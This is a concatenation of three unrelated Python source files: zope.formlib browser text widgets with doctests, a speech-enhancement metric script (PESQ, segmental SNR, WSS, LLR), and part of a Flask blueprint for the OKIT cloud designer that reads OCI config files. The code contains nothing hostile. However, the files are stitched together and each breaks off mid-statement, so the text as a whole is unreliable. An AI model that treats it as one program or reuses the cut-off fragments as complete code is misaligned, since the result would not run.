# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Browser widgets with text-based input
"""
import decimal
from xml.sax import saxutils
from zope.interface import implementer
from zope.datetime import parseDatetimetz
from zope.datetime import DateTimeError
from zope.i18n.format import DateTimeParseError
from zope.formlib._compat import toUnicode, unicode, PY3
from zope.formlib.interfaces import ConversionError
from zope.formlib.i18n import _
from zope.formlib.interfaces import ITextBrowserWidget
from zope.formlib.widget import SimpleInputWidget, renderElement
from zope.formlib.widget import DisplayWidget
def escape(str):
if str is not None:
str = saxutils.escape(str)
return str
@implementer(ITextBrowserWidget)
class TextWidget(SimpleInputWidget):
"""Text widget.
Single-line text (unicode) input
>>> from zope.publisher.browser import TestRequest
>>> from zope.schema import TextLine
>>> field = TextLine(__name__='foo', title=u'on')
>>> request = TestRequest(form={'field.foo': u'Bob'})
>>> widget = TextWidget(field, request)
>>> widget.hasInput()
True
>>> widget.getInputValue()
u'Bob'
>>> def normalize(s):
... return '\\n '.join(filter(None, s.split(' ')))
>>> print(normalize( widget() ))
<input
class="textType"
id="field.foo"
name="field.foo"
size="20"
type="text"
value="Bob"
/>
>>> print(normalize( widget.hidden() ))
<input
class="hiddenType"
id="field.foo"
name="field.foo"
type="hidden"
value="Bob"
/>
Calling `setRenderedValue` will change what gets output:
>>> widget.setRenderedValue("Barry")
>>> print(normalize( widget() ))
<input
class="textType"
id="field.foo"
name="field.foo"
size="20"
type="text"
value="Barry"
/>
Check that HTML is correctly encoded and decoded:
>>> request = TestRequest(
... form={'field.foo': u'<h1>©</h1>'})
>>> widget = TextWidget(field, request)
>>> widget.getInputValue()
u'<h1>©</h1>'
>>> print(normalize( widget() ))
<input
class="textType"
id="field.foo"
name="field.foo"
size="20"
type="text"
value="<h1>&copy;</h1>"
/>
"""
default = ''
displayWidth = 20
displayMaxWidth = ""
extra = ''
style = ''
convert_missing_value = True
def __init__(self, *args):
super(TextWidget, self).__init__(*args)
def __call__(self):
value = self._getFormValue()
if value is None or value == self.context.missing_value:
value = ''
kwargs = {'type': self.type,
'name': self.name,
'id': self.name,
'value': value,
'cssClass': self.cssClass,
'style': self.style,
'size': self.displayWidth,
'extra': self.extra}
if self.displayMaxWidth:
# TODO This is untested.
kwargs['maxlength'] = self.displayMaxWidth
return renderElement(self.tag, **kwargs)
def _toFieldValue(self, input):
if self.convert_missing_value and input == self._missing:
value = self.context.missing_value
else:
# We convert everything to unicode. This might seem a bit crude,
# but anything contained in a TextWidget should be representable
# as a string. Note that you always have the choice of overriding
# the method.
try:
value = toUnicode(input)
except ValueError as v:
raise ConversionError(_("Invalid text data"), v)
return value
class Text(SimpleInputWidget):
def _toFieldValue(self, input):
return super(Text, self)._toFieldValue(input)
class Bytes(SimpleInputWidget):
def _toFieldValue(self, input):
value = super(Bytes, self)._toFieldValue(input)
if isinstance(value, unicode):
try:
value = value.encode('ascii')
except UnicodeError as v:
raise ConversionError(_("Invalid textual data"), v)
return value
class BytesWidget(Bytes, TextWidget):
"""Bytes widget.
Single-line data (string) input
>>> from zope.publisher.browser import TestRequest
>>> from zope.schema import BytesLine
>>> field = BytesLine(__name__='foo', title=u'on')
>>> request = TestRequest(form={'field.foo': u'Bob'})
>>> widget = BytesWidget(field, request)
>>> widget.hasInput()
True
>>> widget.getInputValue()
'Bob'
"""
class BytesDisplayWidget(DisplayWidget):
"""Bytes display widget"""
def __call__(self):
if self._renderedValueSet():
content = self._data
else:
content = self.context.default
return renderElement("pre", contents=escape(content))
# for things which are of the str type on both Python 2 and 3
if PY3: # pragma NO COVER
NativeString = Text
NativeStringWidget = TextWidget
NativeStringDisplayWidget = DisplayWidget
else: # pragma NO COVER
NativeString = Bytes
NativeStringWidget = BytesWidget
NativeStringDisplayWidget = BytesDisplayWidget
class ASCII(NativeString):
"""ASCII"""
class ASCIIWidget(NativeStringWidget):
"""ASCII widget.
Single-line data (string) input
"""
class ASCIIDisplayWidget(NativeStringDisplayWidget):
"""ASCII display widget"""
class URIDisplayWidget(DisplayWidget):
"""URI display widget.
:ivar linkTarget:
The value of the ``target`` attribute for the generated hyperlink.
If this is not set, no ``target`` attribute is generated.
"""
linkTarget = None
def __call__(self):
if self._renderedValueSet():
content = self._data
else:
content = self.context.default
if not content:
# If there is no content it is not useful to render an anchor.
return ''
content = escape(content)
kw = dict(contents=content, href=content)
if self.linkTarget:
kw["target"] = self.linkTarget
return renderElement("a", **kw)
class TextAreaWidget(SimpleInputWidget):
"""TextArea widget.
Multi-line text (unicode) input.
>>> from zope.publisher.browser import TestRequest
>>> from zope.schema import Text
>>> field = Text(__name__='foo', title=u'on')
>>> request = TestRequest(form={'field.foo': u'Hello\\r\\nworld!'})
>>> widget = TextAreaWidget(field, request)
>>> widget.hasInput()
True
>>> widget.getInputValue()
u'Hello\\nworld!'
>>> def normalize(s):
... return '\\n '.join(filter(None, s.split(' ')))
>>> print(normalize( widget() ))
<textarea
cols="60"
id="field.foo"
name="field.foo"
rows="15"
>Hello\r
world!</textarea>
>>> print(normalize( widget.hidden() ))
<input
class="hiddenType"
id="field.foo"
name="field.foo"
type="hidden"
value="Hello world!"
/>
Calling `setRenderedValue` will change what gets output:
>>> widget.setRenderedValue("Hey\\ndude!")
>>> print(normalize( widget() ))
<textarea
cols="60"
id="field.foo"
name="field.foo"
rows="15"
>Hey\r
dude!</textarea>
Check that HTML is correctly encoded and decoded:
>>> request = TestRequest(
... form={'field.foo': u'<h1>©</h1>'})
>>> widget = TextAreaWidget(field, request)
>>> widget.getInputValue()
u'<h1>©</h1>'
>>> print(normalize( widget() ))
<textarea
cols="60"
id="field.foo"
name="field.foo"
rows="15"
><h1>&copy;</h1></textarea>
There was a but which caused the content of <textarea> tags not to be
rendered correctly when there was a conversion error. Make sure the quoting
works correctly::
>>> from zope.schema import Text
>>> field = Text(__name__='description', title=u'Description')
>>> from zope.formlib.interfaces import ConversionError
>>> class TestTextAreaWidget(TextAreaWidget):
... def _toFieldValue(self, input):
... if 'foo' in input:
... raise ConversionError("I don't like foo.")
... return input
...
>>> request = TestRequest(form={'field.description': u'<p>bar</p>'})
>>> widget = TestTextAreaWidget(field, request)
>>> widget.getInputValue()
u'<p>bar</p>'
>>> print(normalize( widget() ))
<textarea
cols="60"
id="field.description"
name="field.description"
rows="15"
><p>bar</p></textarea>
>>> request = TestRequest(form={'field.description': u'<p>foo</p>'})
>>> widget = TestTextAreaWidget(field, request)
>>> try:
... widget.getInputValue()
... except ConversionError as error:
... print(error.doc())
I don't like foo.
>>> print(normalize( widget() ))
<textarea
cols="60"
id="field.description"
name="field.description"
rows="15"
><p>foo</p></textarea>
"""
default = ""
width = 60
height = 15
extra = ""
style = ''
def _toFieldValue(self, value):
value = super(TextAreaWidget, self)._toFieldValue(value)
if value:
try:
value = toUnicode(value)
except ValueError as v:
raise ConversionError(_("Invalid unicode data"), v)
else:
value = value.replace("\r\n", "\n")
return value
def _toFormValue(self, value):
value = super(TextAreaWidget, self)._toFormValue(value)
if value:
value = value.replace("\n", "\r\n")
else:
value = u''
return value
def __call__(self):
return renderElement("textarea",
name=self.name,
id=self.name,
cssClass=self.cssClass,
rows=self.height,
cols=self.width,
style=self.style,
contents=escape(self._getFormValue()),
extra=self.extra)
class BytesAreaWidget(Bytes, TextAreaWidget):
"""BytesArea widget.
Multi-line string input.
>>> from zope.publisher.browser import TestRequest
>>> from zope.schema import Bytes
>>> field = Bytes(__name__='foo', title=u'on')
>>> request = TestRequest(form={'field.foo': u'Hello\\r\\nworld!'})
>>> widget = BytesAreaWidget(field, request)
>>> widget.hasInput()
True
>>> widget.getInputValue()
'Hello\\nworld!'
"""
class ASCIIAreaWidget(NativeString, TextAreaWidget):
"""ASCIIArea widget.
Multi-line string input.
>>> from zope.publisher.browser import TestRequest
>>> from zope.schema import ASCII
>>> field = ASCII(__name__='foo', title=u'on')
>>> request = TestRequest(form={'field.foo': u'Hello\\r\\nworld!'})
>>> widget = ASCIIAreaWidget(field, request)
>>> widget.hasInput()
True
>>> widget.getInputValue()
'Hello\\nworld!'
"""
class PasswordWidget(TextWidget):
"""Password Widget"""
type = 'password'
def __call__(self):
displayMaxWidth = self.displayMaxWidth or 0
if displayMaxWidth > 0:
return renderElement(self.tag,
type=self.type,
name=self.name,
id=self.name,
value='',
cssClass=self.cssClass,
style=self.style,
size=self.displayWidth,
maxlength=displayMaxWidth,
extra=self.extra)
else:
return renderElement(self.tag,
type=self.type,
name=self.name,
id=self.name,
value='',
cssClass=self.cssClass,
style=self.style,
size=self.displayWidth,
extra=self.extra)
def _toFieldValue(self, input):
try:
existing = self.context.get(self.context.context)
except AttributeError:
existing = False
if (not input) and existing:
return self.context.UNCHANGED_PASSWORD
return super(PasswordWidget, self)._toFieldValue(input)
def hidden(self):
raise NotImplementedError(
'Cannot get a hidden tag for a password field')
class FileWidget(TextWidget):
"""File Widget"""
type = 'file'
def __call__(self):
displayMaxWidth = self.displayMaxWidth or 0
hidden = renderElement(self.tag,
type='hidden',
name=self.name + ".used",
id=self.name + ".used",
value="")
if displayMaxWidth > 0:
elem = renderElement(self.tag,
type=self.type,
name=self.name,
id=self.name,
cssClass=self.cssClass,
size=self.displayWidth,
maxlength=displayMaxWidth,
extra=self.extra)
else:
elem = renderElement(self.tag,
type=self.type,
name=self.name,
id=self.name,
cssClass=self.cssClass,
size=self.displayWidth,
extra=self.extra)
return "%s %s" % (hidden, elem)
def _toFieldValue(self, input):
if input is None or input == '':
return self.context.missing_value
try:
seek = input.seek
read = input.read
except AttributeError as e:
raise ConversionError(_('Form input is not a file object'), e)
else:
seek(0)
data = read()
if data or getattr(input, 'filename', ''):
return data
else:
return self.context.missing_value
def hasInput(self):
return ((self.name + ".used" in self.request.form)
or
(self.name in self.request.form)
)
class IntWidget(TextWidget):
"""Integer number widget.
Let's make sure that zeroes are rendered properly:
>>> from zope.schema import Int
>>> field = Int(__name__='foo', title=u'on')
>>> widget = IntWidget(field, None)
>>> widget.setRenderedValue(0)
>>> 'value="0"' in widget()
True
"""
displayWidth = 10
def _toFieldValue(self, input):
if input == self._missing:
return self.context.missing_value
else:
try:
return int(input)
except ValueError as v:
raise ConversionError(_("Invalid integer data"), v)
class FloatWidget(TextWidget):
displayWidth = 10
def _toFieldValue(self, input):
if input == self._missing:
return self.context.missing_value
else:
try:
return float(input)
except ValueError as v:
raise ConversionError(_("Invalid floating point | |
<gh_stars>100-1000
# This script is used to compute CSIG, CBAK and COVL,
# and it is from https://github.com/facebookresearch/denoiser/blob/main/scripts/matlab_eval.py
from scipy.linalg import toeplitz
from tqdm import tqdm
from pesq import pesq
import librosa
import numpy as np
import os
import sys
def eval_composite(ref_wav, deg_wav):
ref_wav = ref_wav.reshape(-1)
deg_wav = deg_wav.reshape(-1)
alpha = 0.95
len_ = min(ref_wav.shape[0], deg_wav.shape[0])
ref_wav = ref_wav[:len_]
ref_len = ref_wav.shape[0]
deg_wav = deg_wav[:len_]
# Compute WSS measure
wss_dist_vec = wss(ref_wav, deg_wav, 16000)
wss_dist_vec = sorted(wss_dist_vec, reverse=False)
wss_dist = np.mean(wss_dist_vec[:int(round(len(wss_dist_vec) * alpha))])
# Compute LLR measure
LLR_dist = llr(ref_wav, deg_wav, 16000)
LLR_dist = sorted(LLR_dist, reverse=False)
LLRs = LLR_dist
LLR_len = round(len(LLR_dist) * alpha)
llr_mean = np.mean(LLRs[:LLR_len])
# Compute the SSNR
snr_mean, segsnr_mean = SSNR(ref_wav, deg_wav, 16000)
segSNR = np.mean(segsnr_mean)
# Compute the PESQ
pesq_raw = PESQ(ref_wav, deg_wav)
Csig = 3.093 - 1.029 * llr_mean + 0.603 * pesq_raw - 0.009 * wss_dist
Csig = trim_mos(Csig)
Cbak = 1.634 + 0.478 * pesq_raw - 0.007 * wss_dist + 0.063 * segSNR
Cbak = trim_mos(Cbak)
Covl = 1.594 + 0.805 * pesq_raw - 0.512 * llr_mean - 0.007 * wss_dist
Covl = trim_mos(Covl)
return {'csig':Csig, 'cbak':Cbak, 'covl':Covl}
# ----------------------------- HELPERS ------------------------------------ #
def trim_mos(val):
return min(max(val, 1), 5)
def lpcoeff(speech_frame, model_order):
# (1) Compute Autocor lags
winlength = speech_frame.shape[0]
R = []
for k in range(model_order + 1):
first = speech_frame[:(winlength - k)]
second = speech_frame[k:winlength]
R.append(np.sum(first * second))
# (2) Lev-Durbin
a = np.ones((model_order,))
E = np.zeros((model_order + 1,))
rcoeff = np.zeros((model_order,))
E[0] = R[0]
for i in range(model_order):
if i == 0:
sum_term = 0
else:
a_past = a[:i]
sum_term = np.sum(a_past * np.array(R[i:0:-1]))
rcoeff[i] = (R[i+1] - sum_term)/E[i]
a[i] = rcoeff[i]
if i > 0:
a[:i] = a_past[:i] - rcoeff[i] * a_past[::-1]
E[i+1] = (1-rcoeff[i]*rcoeff[i])*E[i]
acorr = np.array(R, dtype=np.float32)
refcoeff = np.array(rcoeff, dtype=np.float32)
a = a * -1
lpparams = np.array([1] + list(a), dtype=np.float32)
acorr =np.array(acorr, dtype=np.float32)
refcoeff = np.array(refcoeff, dtype=np.float32)
lpparams = np.array(lpparams, dtype=np.float32)
return acorr, refcoeff, lpparams
# -------------------------------------------------------------------------- #
# ---------------------- Speech Quality Metric ----------------------------- #
def PESQ(ref_wav, deg_wav):
rate = 16000
return pesq(rate, ref_wav, deg_wav, 'wb')
def SSNR(ref_wav, deg_wav, srate=16000, eps=1e-10):
""" Segmental Signal-to-Noise Ratio Objective Speech Quality Measure
This function implements the segmental signal-to-noise ratio
as defined in [1, p. 45] (see Equation 2.12).
"""
clean_speech = ref_wav
processed_speech = deg_wav
clean_length = ref_wav.shape[0]
processed_length = deg_wav.shape[0]
# scale both to have same dynamic range. Remove DC too.
clean_speech -= clean_speech.mean()
processed_speech -= processed_speech.mean()
processed_speech *= (np.max(np.abs(clean_speech)) / np.max(np.abs(processed_speech)))
# Signal-to-Noise Ratio
dif = ref_wav - deg_wav
overall_snr = 10 * np.log10(np.sum(ref_wav ** 2) / (np.sum(dif ** 2) +
10e-20))
# global variables
winlength = int(np.round(30 * srate / 1000)) # 30 msecs
skiprate = winlength // 4
MIN_SNR = -10
MAX_SNR = 35
# For each frame, calculate SSNR
num_frames = int(clean_length / skiprate - (winlength/skiprate))
start = 0
time = np.linspace(1, winlength, winlength) / (winlength + 1)
window = 0.5 * (1 - np.cos(2 * np.pi * time))
segmental_snr = []
for frame_count in range(int(num_frames)):
# (1) get the frames for the test and ref speech.
# Apply Hanning Window
clean_frame = clean_speech[start:start+winlength]
processed_frame = processed_speech[start:start+winlength]
clean_frame = clean_frame * window
processed_frame = processed_frame * window
# (2) Compute Segmental SNR
signal_energy = np.sum(clean_frame ** 2)
noise_energy = np.sum((clean_frame - processed_frame) ** 2)
segmental_snr.append(10 * np.log10(signal_energy / (noise_energy + eps)+ eps))
segmental_snr[-1] = max(segmental_snr[-1], MIN_SNR)
segmental_snr[-1] = min(segmental_snr[-1], MAX_SNR)
start += int(skiprate)
return overall_snr, segmental_snr
def wss(ref_wav, deg_wav, srate):
clean_speech = ref_wav
processed_speech = deg_wav
clean_length = ref_wav.shape[0]
processed_length = deg_wav.shape[0]
assert clean_length == processed_length, clean_length
winlength = round(30 * srate / 1000.) # 240 wlen in samples
skiprate = np.floor(winlength / 4)
max_freq = srate / 2
num_crit = 25 # num of critical bands
USE_FFT_SPECTRUM = 1
n_fft = int(2 ** np.ceil(np.log(2*winlength)/np.log(2)))
n_fftby2 = int(n_fft / 2)
Kmax = 20
Klocmax = 1
# Critical band filter definitions (Center frequency and BW in Hz)
cent_freq = [50., 120, 190, 260, 330, 400, 470, 540, 617.372,
703.378, 798.717, 904.128, 1020.38, 1148.30,
1288.72, 1442.54, 1610.70, 1794.16, 1993.93,
2211.08, 2446.71, 2701.97, 2978.04, 3276.17,
3597.63]
bandwidth = [70., 70, 70, 70, 70, 70, 70, 77.3724, 86.0056,
95.3398, 105.411, 116.256, 127.914, 140.423,
153.823, 168.154, 183.457, 199.776, 217.153,
235.631, 255.255, 276.072, 298.126, 321.465,
346.136]
bw_min = bandwidth[0] # min critical bandwidth
# set up critical band filters. Note here that Gaussianly shaped filters
# are used. Also, the sum of the filter weights are equivalent for each
# critical band filter. Filter less than -30 dB and set to zero.
min_factor = np.exp(-30. / (2 * 2.303)) # -30 dB point of filter
crit_filter = np.zeros((num_crit, n_fftby2))
all_f0 = []
for i in range(num_crit):
f0 = (cent_freq[i] / max_freq) * (n_fftby2)
all_f0.append(np.floor(f0))
bw = (bandwidth[i] / max_freq) * (n_fftby2)
norm_factor = np.log(bw_min) - np.log(bandwidth[i])
j = list(range(n_fftby2))
crit_filter[i, :] = np.exp(-11 * (((j - np.floor(f0)) / bw) ** 2) + \
norm_factor)
crit_filter[i, :] = crit_filter[i, :] * (crit_filter[i, :] > \
min_factor)
# For each frame of input speech, compute Weighted Spectral Slope Measure
num_frames = int(clean_length / skiprate - (winlength / skiprate))
start = 0 # starting sample
time = np.linspace(1, winlength, winlength) / (winlength + 1)
window = 0.5 * (1 - np.cos(2 * np.pi * time))
distortion = []
for frame_count in range(num_frames):
# (1) Get the Frames for the test and reference speeech.
# Multiply by Hanning window.
clean_frame = clean_speech[start:start+winlength]
processed_frame = processed_speech[start:start+winlength]
clean_frame = clean_frame * window
processed_frame = processed_frame * window
# (2) Compuet Power Spectrum of clean and processed
clean_spec = (np.abs(np.fft.fft(clean_frame, n_fft)) ** 2)
processed_spec = (np.abs(np.fft.fft(processed_frame, n_fft)) ** 2)
clean_energy = [None] * num_crit
processed_energy = [None] * num_crit
# (3) Compute Filterbank output energies (in dB)
for i in range(num_crit):
clean_energy[i] = np.sum(clean_spec[:n_fftby2] * \
crit_filter[i, :])
processed_energy[i] = np.sum(processed_spec[:n_fftby2] * \
crit_filter[i, :])
clean_energy = np.array(clean_energy).reshape(-1, 1)
eps = np.ones((clean_energy.shape[0], 1)) * 1e-10
clean_energy = np.concatenate((clean_energy, eps), axis=1)
clean_energy = 10 * np.log10(np.max(clean_energy, axis=1))
processed_energy = np.array(processed_energy).reshape(-1, 1)
processed_energy = np.concatenate((processed_energy, eps), axis=1)
processed_energy = 10 * np.log10(np.max(processed_energy, axis=1))
# (4) Compute Spectral Shape (dB[i+1] - dB[i])
clean_slope = clean_energy[1:num_crit] - clean_energy[:num_crit-1]
processed_slope = processed_energy[1:num_crit] - \
processed_energy[:num_crit-1]
# (5) Find the nearest peak locations in the spectra to each
# critical band. If the slope is negative, we search
# to the left. If positive, we search to the right.
clean_loc_peak = []
processed_loc_peak = []
for i in range(num_crit - 1):
if clean_slope[i] > 0:
# search to the right
n = i
while n < num_crit - 1 and clean_slope[n] > 0:
n += 1
clean_loc_peak.append(clean_energy[n - 1])
else:
# search to the left
n = i
while n >= 0 and clean_slope[n] <= 0:
n -= 1
clean_loc_peak.append(clean_energy[n + 1])
# find the peaks in the processed speech signal
if processed_slope[i] > 0:
n = i
while n < num_crit - 1 and processed_slope[n] > 0:
n += 1
processed_loc_peak.append(processed_energy[n - 1])
else:
n = i
while n >= 0 and processed_slope[n] <= 0:
n -= 1
processed_loc_peak.append(processed_energy[n + 1])
# (6) Compuet the WSS Measure for this frame. This includes
# determination of the weighting functino
dBMax_clean = max(clean_energy)
dBMax_processed = max(processed_energy)
# The weights are calculated by averaging individual
# weighting factors from the clean and processed frame.
# These weights W_clean and W_processed should range
# from 0 to 1 and place more emphasis on spectral
# peaks and less emphasis on slope differences in spectral
# valleys. This procedure is described on page 1280 of
# Klatt's 1982 ICASSP paper.
clean_loc_peak = np.array(clean_loc_peak)
processed_loc_peak = np.array(processed_loc_peak)
Wmax_clean = Kmax / (Kmax + dBMax_clean - clean_energy[:num_crit-1])
Wlocmax_clean = Klocmax / (Klocmax + clean_loc_peak - \
clean_energy[:num_crit-1])
W_clean = Wmax_clean * Wlocmax_clean
Wmax_processed = Kmax / (Kmax + dBMax_processed - \
processed_energy[:num_crit-1])
Wlocmax_processed = Klocmax | |
<reponame>davidkhala/oci-designer-toolk
# Copyright (c) 2020, 2021, Oracle and/or its affiliates.
# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl.
"""Provide Module Description
"""
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
__author__ = ["<NAME> (Oracle Cloud Solutions A-Team)"]
__version__ = "1.0.0"
__module__ = "okitWebDesigner"
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
import configparser
import functools
import oci
import os
import shutil
import tempfile
import time
import urllib
import giturlparse
import glob
import ast
from git import Repo
from flask import Blueprint
from flask import current_app
from flask import jsonify
from flask import redirect
from flask import render_template
from flask import request
from flask import send_from_directory
from flask import session
from flask import url_for
import json
from common.okitCommon import jsonToFormattedString
from common.okitCommon import logJson
from common.okitCommon import readJsonFile
from common.okitCommon import standardiseIds
from common.okitCommon import writeJsonFile
from common.okitLogging import getLogger
from model.okitValidation import OCIJsonValidator
from generators.okitAnsibleGenerator import OCIAnsibleGenerator
from generators.okitTerraform11Generator import OCITerraform11Generator
from generators.okitTerraformGenerator import OCITerraformGenerator
from generators.okitResourceManagerGenerator import OCIResourceManagerGenerator
from generators.okitMarkdownGenerator import OkitMarkdownGenerator
# Configure logging
logger = getLogger()
bp = Blueprint('okit', __name__, url_prefix='/okit', static_folder='static/okit')
debug_mode = bool(str(os.getenv('DEBUG_MODE', 'False')).title())
template_root = '/okit/visualiser/templates'
def standardiseJson(json_data={}, **kwargs):
logJson(json_data)
json_data = standardiseIds(json_data)
logJson(json_data)
return json_data
def readConfigFileSections(config_file='~/.oci/config'):
if os.getenv('OCI_CLI_AUTH', 'config') != 'instance_principal':
logger.debug('Config File {0!s:s}'.format(config_file))
abs_config_file = os.path.expanduser(config_file)
logger.debug('Config File {0!s:s}'.format(abs_config_file))
config = configparser.ConfigParser()
config.read(abs_config_file)
config_sections = []
if 'DEFAULT' in config:
config_sections = ['DEFAULT']
config_sections.extend(config.sections())
logger.info('Config Sections {0!s:s}'.format(config_sections))
else:
config_sections = ['Instance Principal']
return config_sections
def readGitConfigFile(config_file='~/.oci/git_repositories'):
logger.debug('Setting File {0!s:s}'.format(config_file))
abs_config_file = os.path.expanduser(config_file)
logger.debug('Setting File {0!s:s}'.format(abs_config_file))
config = configparser.ConfigParser()
config.read(abs_config_file)
repo_list = []
for each_git_section in config.sections():
repo_list.append({'label': each_git_section, 'branch': config[each_git_section]['branch'], 'url': config[each_git_section]['url']})
logger.info(repo_list)
return repo_list
def getConfigFileValue(section, key, config_file='~/.oci/config'):
value = ''
if os.getenv('OCI_CLI_AUTH', 'config') != 'instance_principal':
logger.debug('Config File {0!s:s}'.format(config_file))
abs_config_file = os.path.expanduser(config_file)
logger.debug('Config File {0!s:s}'.format(abs_config_file))
config = configparser.ConfigParser()
config.read(abs_config_file)
value = config[section][key]
return value
def validateConfigFile(config_file='~/.oci/config'):
results = []
if os.getenv('OCI_CLI_AUTH', 'config') != 'instance_principal':
logger.debug('Config File {0!s:s}'.format(config_file))
abs_config_file = os.path.expanduser(config_file)
logger.debug('Config File {0!s:s}'.format(abs_config_file))
config = configparser.ConfigParser()
config.read(abs_config_file)
if len(config.sections()) == 0 and 'DEFAULT' not in config:
results.append('OCI Connect Config file is either missing or empty.')
else:
for section in config:
key_file = config[section]['key_file']
if not os.path.exists(os.path.expanduser(key_file)):
results.append('[{0!s:s}] Key File {1!s:s} does not exist.'.format(section, key_file))
logger.info(results)
return results
#
# Define Error Handlers
#
@bp.errorhandler(Exception)
def handle_exception(error):
message = [str(x) for x in error.args]
status_code = 500
success = False
response = {
'success': success,
'error': {
'type': error.__class__.__name__,
'message': message
}
}
logger.exception(error)
logJson(response)
return jsonify(response), status_code
#
# Define Endpoints
#
@bp.route('/designer', methods=(['GET']))
def designer():
local = current_app.config.get('LOCAL', False)
if not local and session.get('username', None) is None:
logger.info('<<<<<<<<<<<<<<<<<<<<<<<<< Redirect to Login >>>>>>>>>>>>>>>>>>>>>>>>>')
return redirect(url_for('okit.login'), code=302)
# Test if developer mode
developer_mode = (request.args.get('developer', default='false') == 'true')
if developer_mode:
logger.info("<<<<<<<<<<<<<<<<<<<<<<<<<< Developer Mode >>>>>>>>>>>>>>>>>>>>>>>>>>")
# Test if experimental mode
experimental_mode = (request.args.get('experimental', default='false') == 'true')
if experimental_mode:
logger.info("<<<<<<<<<<<<<<<<<<<<<<<<<< Experimental Mode >>>>>>>>>>>>>>>>>>>>>>>>>>")
# Test if cd3 mode
cd3_mode = (request.args.get('cd3', default='false') == 'true')
if cd3_mode:
logger.info("<<<<<<<<<<<<<<<<<<<<<<<<<< CD3 Mode >>>>>>>>>>>>>>>>>>>>>>>>>>")
# Test if PCA mode
pca_mode = (request.args.get('pca', default='false') == 'true')
if pca_mode:
logger.info("<<<<<<<<<<<<<<<<<<<<<<<<<< PCA Mode >>>>>>>>>>>>>>>>>>>>>>>>>>")
# Test if A2C mode
a2c_mode = (request.args.get('a2c', default='false') == 'true')
if a2c_mode:
logger.info("<<<<<<<<<<<<<<<<<<<<<<<<<< A2C Mode >>>>>>>>>>>>>>>>>>>>>>>>>>")
# Test if Ansible mode
ansible_mode = (request.args.get('ansible', default='false') == 'true')
if ansible_mode:
logger.info("<<<<<<<<<<<<<<<<<<<<<<<< Ansible Mode >>>>>>>>>>>>>>>>>>>>>>>>")
# Read Artifact Model Specific JavaScript Files
artefact_model_js_files = sorted(os.listdir(os.path.join(bp.static_folder, 'model', 'js', 'artefacts')))
# Read Artifact View Specific JavaScript Files
if os.path.exists(os.path.join(bp.static_folder, 'view', 'js', 'artefacts')) and os.path.isdir(os.path.join(bp.static_folder, 'view', 'js', 'artefacts')):
artefact_view_js_files = sorted(os.listdir(os.path.join(bp.static_folder, 'view', 'js', 'artefacts')))
else:
artefact_view_js_files = []
artefact_view_js_files.extend(sorted(os.listdir(os.path.join(bp.static_folder, 'view', 'designer', 'js', 'artefacts'))))
# Read Pallete Json
palette_json = readJsonFile(os.path.join(bp.static_folder, 'palette', 'palette.json'))
# # Get Palette Icon Groups / Icons
# svg_files = []
# svg_icon_groups = {}
# # Read Files
# for (dirpath, dirnames, filenames) in os.walk(os.path.join(bp.static_folder, 'palette')):
# logger.debug('dirpath : {0!s:s}'.format(dirpath))
# logger.debug('dirnames : {0!s:s}'.format(dirnames))
# logger.debug('filenames : {0!s:s}'.format(filenames))
# if os.path.basename(dirpath) != 'palette':
# svg_files.extend([os.path.join(os.path.basename(dirpath), f) for f in filenames if f.endswith(".svg")])
# svg_icon_groups[os.path.basename(dirpath)] = [f for f in filenames if f.endswith(".svg")]
# else:
# svg_files.extend([f for f in filenames if f.endswith(".svg")])
# logger.debug('Files Walk : {0!s:s}'.format(svg_files))
# logger.debug('SVG Icon Groups {0!s:s}'.format(svg_icon_groups))
# palette_icon_groups = []
# for key in sorted(svg_icon_groups.keys()):
# palette_icon_group = {'name': str(key).title(), 'icons': []}
# for palette_svg in sorted(svg_icon_groups[key]):
# palette_icon = {'svg': os.path.join(key, palette_svg), 'title': os.path.basename(palette_svg).split('.')[0].replace('_', ' ')}
# palette_icon_group['icons'].append(palette_icon)
# palette_icon_groups.append(palette_icon_group)
# logger.debug('Palette Icon Groups : {0!s:s}'.format(palette_icon_groups))
# logJson(palette_icon_groups)
config_sections = {"sections": readConfigFileSections()}
#Render The Template
return render_template('okit/okit_designer.html',
artefact_model_js_files=artefact_model_js_files,
artefact_view_js_files=artefact_view_js_files,
palette_json=palette_json,
# palette_icon_groups=palette_icon_groups,
# fragment_icons=fragment_icons,
# okit_templates_groups=template_groups,
# okit_template_categories=template_categories,
local_okit=local,
developer_mode=developer_mode, experimental_mode=experimental_mode, cd3_mode=cd3_mode, a2c_mode=a2c_mode, pca_mode=pca_mode, ansible_mode=ansible_mode)
# Template Processing
@bp.route('/panel/templates', methods=(['GET']))
def templates_panel():
# ref_arch_root = os.path.join(bp.static_folder, 'templates', 'reference_architecture')
ref_arch_root = os.path.join(current_app.instance_path, 'templates', 'reference_architecture')
ref_arch_templates = dir_to_json(ref_arch_root, current_app.instance_path, 'children', 'templates')
# ref_arch_templates = dir_to_json(ref_arch_root, ref_arch_root, 'children', 'templates')
ref_arch_category = {'name': 'Reference Architectures', 'path': 'reference_architecture', 'children': [], 'templates': []}
ref_arch_category = hierarchy_category(ref_arch_category, ref_arch_templates, current_app.instance_path)
# user_root = os.path.join('okit', 'templates', 'user')
user_root = os.path.join(current_app.instance_path, 'templates', 'user')
user_templates = dir_to_json(user_root, current_app.instance_path, 'children', 'templates')
# user_templates = dir_to_json(user_root, user_root, 'children', 'templates')
user_category = {'name': 'User', 'path': 'user', 'children': [], 'templates': []}
user_category = hierarchy_category(user_category, user_templates, current_app.instance_path)
template_categories = [ref_arch_category, user_category]
logger.debug(f'Template Categories : {jsonToFormattedString(template_categories)}')
#Render The Template
return render_template('okit/templates_panel.html', template_categories=template_categories)
def dir_to_json(rootdir, reltodir=None, dkey='dirs', fkey='files'):
# logger.info(f'Root Path: {rootdir}')
# logger.info(f'Relative to Path: {reltodir}')
# logger.info(f'Relative Path: {os.path.relpath(rootdir, reltodir)}')
hierarchy = {
'id': os.path.relpath(rootdir, reltodir).replace('/','_'),
